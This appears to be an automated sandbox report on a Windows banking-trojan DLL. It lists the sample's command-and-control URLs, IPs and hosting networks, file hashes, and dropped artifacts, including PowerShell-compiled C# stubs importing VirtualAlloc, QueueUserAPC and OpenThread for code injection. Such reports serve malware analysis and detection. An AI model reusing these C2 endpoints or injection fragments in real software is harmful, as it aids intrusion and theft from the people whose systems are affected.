    http://meganetwork.top/jerry/hMt_2FkMsACDp/Ggtycrpr/3jyWUhPR8uVsI6k_2Bbu1hb/kdbdt_2BOm/9tP_2BQtD9vLJNuMH/RpW6bg0QRvZX/QXfPDGL10GT/SdaapIAklDbfEO/Uj_2BAmamwU2u8BHod3aP/PgD0dTDTJEMSc0UK/j1e9AdZnRhxmLd2/iyZSWXfqsPP5Mz2_2F/RxfeMhVZi/snsYr1rBTn9DbB3n1htJ/THaNUdrjEpMaPV5FZB0/hnSI3F95hi8RSrq2PqAvJg/NhyoyNMSlw300/RuRhnMAi/yuKjfRG8BZDb0ZtEsV/Y0c.bobtrue
    • Avira URL Cloud: safe
    unknown
    http://31.207.46.124/jerry/5BN0ICz4uWiAkFly3NWE/wdb3AqkjVSwyFUhuqrz/lHc_2B4wxe4nLA1HUOqfnP/QlJbnXjOv_2Ft/Q5KyRgYr/iv5NSA792h1xHcDS5L6fsEG/6f6Mo_2Fxe/zRCCWBAwTeLJqLbV9/kqNgWULptALz/6SvcsPi5EHX/ePWs4WCPyL8a8x/7zSS0_2F0FPHafzsv8Nrj/_2FvbJqIrbuIliTu/28Zs8gl0EBncgLE/E0Xb7wwqBhrlCP2lDF/LuKqKVbSw/I0P0F2TMmM1CY00Wt6n5/Qvz8fbopIWFtWKI6Q1E/CrYECeKd/SC2ahZciZ/j0v83.bobtrue
    • Avira URL Cloud: safe
    unknown
    http://internetcoca.in/jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/lHo21jXWhX39Xk5R4R/_2F_2FyAz/YZ8oYHuNhYCmHdf0wSbR/salWQlnNDBjP7A66JVO/sppCnKDjVH3lbE5G7LF5U7/5LSg_2BcZCu_2/F5_2FR_2/B6AH2Mv27ibqMLrY4km_2Fx/gY8_2FL6Mv/5k_2BKapoEIZ8reVa/lFw7CKKCr00_/2FffYJ4qZ35/6uQ8_2B3xnzdTZ/FQ3TIcDZlZ_2BmcKyHZ4r/5C6qwwmwbcuALm_2/BEPFExtOhb_2B6k/D_2FhWFqp3TtB_2BN/1vytrT.bobtrue
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://meganetwork.top/jerry/hMt_2FkMsACDp/Ggtycrpr/3jyWUhPR8uVsI6k_2Bbu1hb/kdbdt_2BOm/9tP_2BQtD9vLJrundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://internetcoca.in/jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/lrundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398416154.0000000001086000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: malware
    unknown
    http://31.207.46.124/jerry/3nn_2BNEVXd0Rxht2AWGTxC/GW4p8XGNLb/FjhKQ84fH_2BkNicF/oP5tQPlnMrJr/VzmSaztrundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://internetcoca.in/rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: malware
    unknown
    http://constitution.org/usdeclar.txtrundll32.exe, 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://constitution.org/usdeclar.txtC:rundll32.exe, 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://31.207.46.124/jerry/jTzxAnqL2OvVUr_2F/fauV7gAxn9qx/8pFCJL9tnDU/iLzaMJ4HX1GykO/HoC2Mc7MKhdMVEZrundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://https://file://USER.ID%lu.exe/updrundll32.exe, 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    low
    http://supernetwork.top/%rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://supernetwork.top/Erundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://supernetwork.top/rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://31.207.46.124/jerry/5BN0ICz4uWiAkFly3NWE/wdb3AqkjVSwyFUhuqrz/lHc_2B4wxe4nLA1HUOqfnP/QlJbnXjOvrundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000011.00000002.884674469.000002EFAB931000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      http://internetcoca.in/arundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      http://supernetwork.top/jerry/c5L4i7gs7U/TPlgCZUjVlFX76S6w/ptrxQO4jUOhI/F6ePNzRyuKF/MbNtzcp0Ju65aR/Zrundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://meganetwork.top/rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      31.41.44.51
      meganetwork.topRussian Federation
      56577ASRELINKRUtrue
      31.207.46.124
      unknownNetherlands
      57043HOSTKEY-ASNLtrue
      172.105.103.207
      internetcoca.inUnited States
      63949LINODE-APLinodeLLCUStrue
      62.173.149.9
      supernetwork.topRussian Federation
      34300SPACENET-ASInternetServiceProviderRUtrue
      IP
      192.168.2.1
      Joe Sandbox Version:36.0.0 Rainbow Opal
      Analysis ID:752294
      Start date and time:2022-11-23 10:53:38 +01:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 10m 58s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:7078612.dll
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:28
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:2
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.bank.troj.expl.evad.winDLL@27/18@3/5
      EGA Information:
      • Successful, ratio: 66.7%
      HDC Information:
      • Successful, ratio: 70% (good quality ratio 67.1%)
      • Quality average: 82.2%
      • Quality standard deviation: 27.1%
      HCA Information:
      • Successful, ratio: 99%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .dll
      • Override analysis time to 240s for rundll32
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
      • TCP Packets have been reduced to 100
      • Excluded IPs from analysis (whitelisted): 13.107.42.16
      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, ctldl.windowsupdate.com, l-0007.l-msedge.net, config.edge.skype.com
      • Execution Graph export aborted for target mshta.exe, PID 5740 because there are no executed function
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtReadVirtualMemory calls found.
      TimeTypeDescription
      10:54:42API Interceptor1x Sleep call for process: rundll32.exe modified
      10:57:16API Interceptor40x Sleep call for process: powershell.exe modified
      No context
      No context
      No context
      No context
      No context
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):11606
      Entropy (8bit):4.883977562702998
      Encrypted:false
      SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
      MD5:1F1446CE05A385817C3EF20CBD8B6E6A
      SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
      SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
      SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
      Malicious:false
      Preview:PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:modified
      Size (bytes):64
      Entropy (8bit):0.9260988789684415
      Encrypted:false
      SSDEEP:3:Nlllulb/lj:NllUb/l
      MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
      SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
      SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
      SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
      Malicious:false
      Preview:@...e................................................@..........
      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      File Type:MSVC .res
      Category:dropped
      Size (bytes):652
      Entropy (8bit):3.0630727197363155
      Encrypted:false
      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryf8Lak7YnqqU8kPN5Dlq5J:+RI+ycuZhNoakSUPNnqX
      MD5:792CCD28AC54F6224043AAEAE461DF09
      SHA1:D8223DE7BF3ED16F67F8B3D2F1E7BA46B4806F3D
      SHA-256:759F06AFF0420F6EF30D56B3A5E1B50F9FF3DCCA4B3383276F3682E7A5D0A59B
      SHA-512:C91E82D8B29C481777E32C6D37667773E8B8403BA62C9EF425BA897A683392F2EADD2CB6505214872AA27CBDA64548000A4364F9AC6ED5150A3E304BD430161F
      Malicious:false
      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.g.a.y.s.o.l.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...o.g.a.y.s.o.l.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      File Type:MSVC .res
      Category:dropped
      Size (bytes):652
      Entropy (8bit):3.1182835611084485
      Encrypted:false
      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKFMak7YnqqRFBPN5Dlq5J:+RI+ycuZhNgqakSRbPNnqX
      MD5:D6BD22CE774B232598462046C508A360
      SHA1:486AB78EC43B23B403BA9007555BFD0D426F5F58
      SHA-256:961799A1F249343266043B2C2246599C26A251A38413602186D339DA0D3212E1
      SHA-512:0E4006E8E667898B6DCE4C4A975B1D554EFFCDCA34E99C57B3784B0E8DFA1DED72A680E5F3DB2E81FB8CAFEEC519193AC09CB7D5A44A14FB9A344E3C62B1D791
      Malicious:false
      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.p.l.k.x.j.d.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.p.l.k.x.j.d.z...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Nov 23 18:57:22 2022, 1st section name ".debug$S"
      Category:modified
      Size (bytes):1328
      Entropy (8bit):3.977219273603299
      Encrypted:false
      SSDEEP:24:Hye9EVeAJeQZH8hhKdNwI+ycuZhNoakSUPNnq9qd:sH7ZGKdm1uloa30q9K
      MD5:48E8B48367CFFAF1D5A5D28FEEC3356D
      SHA1:58732DD2AFB79076F84E252034DFBCECE9179C0D
      SHA-256:C67A41D39473CA8E429BA98EA4CF68263C994F0CD1D47FE37E75B777A4309F71
      SHA-512:362086BA6A4D415B5A460158640FC2177F7B9EA3949B396F92318FB4AE0143D5264CC2847F3505FC16434512F6DC891E4C0EEF8856E6E95B85051891EF62FE75
      Malicious:false
      Preview:L....m~c.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........O....c:\Users\user\AppData\Local\Temp\CSC256FD05AD86B46298536785867B2F65B.TMP................y,.(.T."@C...a............7.......C:\Users\user~1\AppData\Local\Temp\RESE9EF.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.g.a.y.s.o.l.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Nov 23 18:57:25 2022, 1st section name ".debug$S"
      Category:modified
      Size (bytes):1328
      Entropy (8bit):3.9983421451530075
      Encrypted:false
      SSDEEP:24:HYke9EVxECuZH8FhKdNwI+ycuZhNgqakSRbPNnq9qd:4qxEzZczKdm1ulgqa3RRq9K
      MD5:E4DB20336E54A2EA89FCE975F92E7B0E
      SHA1:7D12277106440BCA94753C2E1C8088DC8AA8EB92
      SHA-256:B220E22E079FAB2B94668FF46DCD774CD16E47464563C6683999D4CB073934D7
      SHA-512:37356CA035F193FD07F17EE3D832140C42B3B464F203233A59A41B0737822FE7ED08B4C9122BAF6ACCD8E84FE1050DDF247A0378F18F47870777BD2A64861F85
      Malicious:false
      Preview:L....m~c.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........O....c:\Users\user\AppData\Local\Temp\CSCCB299674C9DE4DC69C5A44CA79DFE4B3.TMP.................".wK#%.F F...`..........7.......C:\Users\user~1\AppData\Local\Temp\RESF4AD.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.p.l.k.x.j.d.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Preview:1
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Preview:1
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:C++ source, Unicode text, UTF-8 (with BOM) text
      Category:dropped
      Size (bytes):408
      Entropy (8bit):5.010960710803927
      Encrypted:false
      SSDEEP:6:V/DsYLDS81zu4g8SMRSRa+eNMjSSRrF1HWSSRNGy+lVuf/Qy:V/DTLDfuL9eg5rT25BecIy
      MD5:0A5374E53F44AC8B609707A893F72B21
      SHA1:83EC00746897BCACF4C5A049B7E090D057F62CF9
      SHA-256:0388C68B7B848CB08941EDBFE4BCAA8F6DF3C461DF1C9A7542103E279F64C5F9
      SHA-512:CE62CB7723A6FCB5448C7C096C293A503662888F75F1A92EA8A9A15955E82AD6F7773829604633782F0E3E8D5BB07286BC281A94D2F99F0F57D4CEA4E873CDD4
      Malicious:false
      Preview:.using System;.using System.Runtime.InteropServices;..namespace uvsfmoww.{. public class sootnkjqby. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint nsgpgnemm,uint ejvqf);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr eigaolh,uint rqunvgvf,uint pwkvythdbbj,uint hvenr);.. }..}.
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (356), with no line terminators
      Category:dropped
      Size (bytes):359
      Entropy (8bit):5.2644306569390205
      Encrypted:false
      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fmmzxs7+AEszIcNwi23fmwA:p37Lvkmb6KwZ+mWZEJZ+wA
      MD5:4A62CFF5CE7CD77A6AAB90F135E32490
      SHA1:7B482E252908AD7E7EF1C62363BA3526F0D03C96
      SHA-256:71CC6079C549F7B5AA6C0E23F451734441FB79007D781272FEBBF8F4FB1DEAC8
      SHA-512:7A7073C60EE332F147728F0E2482654C7550EECDF615CAB0B16075ADC4198C1C440E6A3AB399B0A60508F4084D988B4CD19E8AC9B2A147E5798E6280BC52E0AF
      Malicious:false
      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\bplkxjdz.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bplkxjdz.0.cs"
      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
      Category:dropped
      Size (bytes):3584
      Entropy (8bit):2.6271113880049968
      Encrypted:false
      SSDEEP:48:6oXE7S5pwOYQ9UWIFJZ0ZX1ulgqa3RRq:27S5pllN7eZK
      MD5:9CB7433DCE90DF8ABC10396C1DDCDC1B
      SHA1:959A5D51597ED6117DC673DF7345EF7DE7EAAD25
      SHA-256:C1FAF1643EC792240CA386AA28FD15995DECF75AE0DC07F2F5A5156AF8BD1DD7
      SHA-512:3668CD66FFADD9F281301B7CE458A03DAA72CCA49781B0943F9B67EA7B6A82058D4C2909A6FDCC3AE029FD0A4F1054EFB52C8FB4B84C44EEAEF591BD7B4A5B63
      Malicious:false
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....m~c...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................;.4...............(.......................".............. B............ T............ \.....P ......i.........o.....y...........................i. ...i...!.i.%...i.......*.....3.;.....B.......T.......\...........
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (435), with CRLF, CR line terminators
      Category:modified
      Size (bytes):856
      Entropy (8bit):5.333731158407823
      Encrypted:false
      SSDEEP:12:xKIR37Lvkmb6KwZ+mWZEJZ+w1KaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6Kg8EvzKaM5DqBVKVrdFAMBJTH
      MD5:B35702C626A4E6800F7CD3B2171E5CDF
      SHA1:060BA7A176BE302817C3B3BD69059201BD7FAAD5
      SHA-256:62F7A3C2EAB733A6D714EF6DA7A83A655FC68B9707202E1FBF68588E393A8211
      SHA-512:24B500A3918AD28CCCAFCBAB641052AAC0BA8E8C96FD1D3DC1B352A745E6D446A22116C6D4E4F230B4314EDEABC935D4DA48B4A65F175907D7B274025259273C
      Malicious:false
      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\bplkxjdz.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bplkxjdz.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:C++ source, Unicode text, UTF-8 (with BOM) text
      Category:dropped
      Size (bytes):408
      Entropy (8bit):5.029461224619345
      Encrypted:false
      SSDEEP:6:V/DsYLDS81zu4g0HMRSR7a1HMEqeJSSRa+rVSSRnA/fM5b5y:V/DTLDfusPmBv9rV5nA/E15y
      MD5:F58CC7462A9DC35FA5CCF9D605D846F9
      SHA1:C864BBE18005D5C8E0C95CF71CF82AFC1F2222A0
      SHA-256:ADEA20D896D1565230E0799AC1E5E14719062CE0E00080C412222A98BDDCADCB
      SHA-512:D13C80EA909A9F6EBEDEAA8D4E73CFD01D3D8B465B02B1F5663F22EF189E9F0B5329B60FCB6C888334C370C69CA92DEE1A9B5F0B0262377132E4A6822970E6F1
      Malicious:false
      Preview:.using System;.using System.Runtime.InteropServices;..namespace uvsfmoww.{. public class ihnbcdijjp. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr qigvd,IntPtr ecqs,IntPtr feru);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint stj,uint ixdnpkhvss,IntPtr pfclhkyyb);.. }..}.
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (356), with no line terminators
      Category:dropped
      Size (bytes):359
      Entropy (8bit):5.192390536000973
      Encrypted:false
      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23func+zxs7+AEszIcNwi23funlA:p37Lvkmb6KwZic+WZEJZiG
      MD5:4D3E3BC796552DAF9225999B786796AC
      SHA1:2144C9EEC19E921D51FC39631F55900F5AED73C1
      SHA-256:48B815A28D28839BA9B26FDDD531E70839B9BB0EFF2EF1DA377259BED6B24974
